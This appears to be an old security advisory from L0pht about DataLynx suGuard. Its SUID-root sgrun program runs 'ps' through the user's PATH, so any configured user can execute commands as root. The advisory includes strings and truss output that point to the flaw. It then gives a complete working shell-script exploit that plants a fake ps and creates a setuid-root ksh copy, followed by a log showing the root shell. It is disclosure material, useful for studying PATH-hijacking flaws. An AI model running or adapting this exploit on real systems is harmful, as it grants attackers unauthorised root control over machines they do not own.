COMMAND

    suGuard

SYSTEMS AFFECTED

    Systems with suGuard rev 1.0 from DataLynx

PROBLEM

    Following is  based on  L0pht Advisory  and was  discovered by Dr.
    Mudge.  During a cursory examination of DataLynx's suGuard program
    to  exploit  /tmp  vulnerabilities,  much  more  blatent  security
    problems were uncovered.  In particular, a process listing is  run
    from suGuard's main application.   The first instance of the  'ps'
    program found in the users  PATH environment is assumed to  be the
    valid ps  program and  is run  with root  privileges.   sgrun, the
    datalynx  program,  is  SUID  root  and  as  such enables any user
    configured for suGuard to execute arbitrary commands as root.
    Example:

        [furby-death] ./dlx_sploit.sh /bin/datalynx/sgrun Identify
        datalynx sgrun proof of concept exploit from L0pht [mudge@l0pht.com]

        Segmentation Fault
        root shell created as ./sushi

        [furby-death] ls -l sushi
        -r-sr-xr-x   1 root     other     186356 Oct  1 14:25 sushi
        [furby-death] ./sushi
        #

    suGuard is a commercial product put out by a company name DataLynx
    It  is  basically  sudo  with  a  GUI  interface  and  some  other
    functionality.  Since  it  is   designed  to  manage   priviledged
    execution of programs is installed SUID root.  A quick  strings(1)
    shows several likely problems in the code:

        71800 /tmp
        74192 /tmp/dxpids.%d
        74208 ps -ef > %s
        78600 /tmp/gdtemp1
        78616 ps -ef > %s

    The /tmp  lines show  improper usage  of the  /tmp directory while
    the ps lines indicate what is most likely the args to a s{n}printf
    that will  be handed  off for  execution.   A quick  nm(1) further
    validates our concerns:

        0000204184 U popen
        0000203536 U execvp

    There  are  a  couple  of  quick  attacks to attempt here.  First,
    playing with the path and second playing with the field  seperator
    IFS (both work here by the way).  truss'ing the program will  show
    the problems in  much more detail  [note: Identify is  the profile
    name Dr. M. gave /bin/id for sgrun - see the suGuard documentation
    for how to set these up]:

        truss -f -o xxx /bin/datalynx/sgrun Identify
        grep ps xxx
        [snip]
        15651:  stat64("/usr/sbin/ps", 0xEFFFF2D8)              Err#2 ENOENT
        15651:  stat64("/usr/bin/ps", 0xEFFFF2D8)               = 0
        15651:  access("/usr/bin/ps", 9)                        = 0
        15653:  execve("/usr/bin/ps", 0x00038B78, 0x00038BAC)  argc = 2
        [snip]

    The above trace segment shows  the walking of PATH directories  to
    find ps and then execute it  with the arguments we noted from  the
    strings(1) run.  This is what we expect since ps was not given  an
    explicit path  and the  calls for  execution were  either popen or
    execvp, both of which  would follow the PATH  environment variable
    to  find  the  executable.   Though  we  exercise  this particular
    problem,  it  should  be  noted  that  several others exist in the
    program.  Exploit code:

    #!/bin/sh
    # sgrun exploit - the types of vulnerabilities that this exploit exercises
    #  have no right being introduced to code in this day and age. Much less
    #  code which presents itself under the pretenses of securing your system.
    #   .mudge 01.02.99
    #
    SUSHI=./sushi

    if [ $# -ne 2 ] ; then
      echo Must specify path to sgrun [/bin/datalynx/sgrun] and sgrun argument
      echo  mudge@l0pht.com [01.02.99]
      exit 1
    fi

    SGRUN=$1
    ARG=$2

    if [ -f ${SUSHI} ] ; then
      echo root shell already created?
      exit
    fi

    echo datalynx sgrun proof of concept exploit from L0pht [mudge@l0pht.com]
    echo

    cat > ./ps << FOEFOE
    #!/bin/sh
    cp /bin/ksh ${SUSHI}
    chown root ${SUSHI}
    chmod 4555 ${SUSHI}
    FOEFOE

    chmod 755 ./ps

    PATH=.:${PATH}
    export PATH

    #/bin/datalynx/sgrun Identify
    ${SGRUN} ${ARG}
    if [ -f ${SUSHI} ] ; then
      echo root shell created as ${SUSHI}
      ls -l ${SUSHI}
      echo
    fi

SOLUTION

    Let's hope DataLynx do programing again.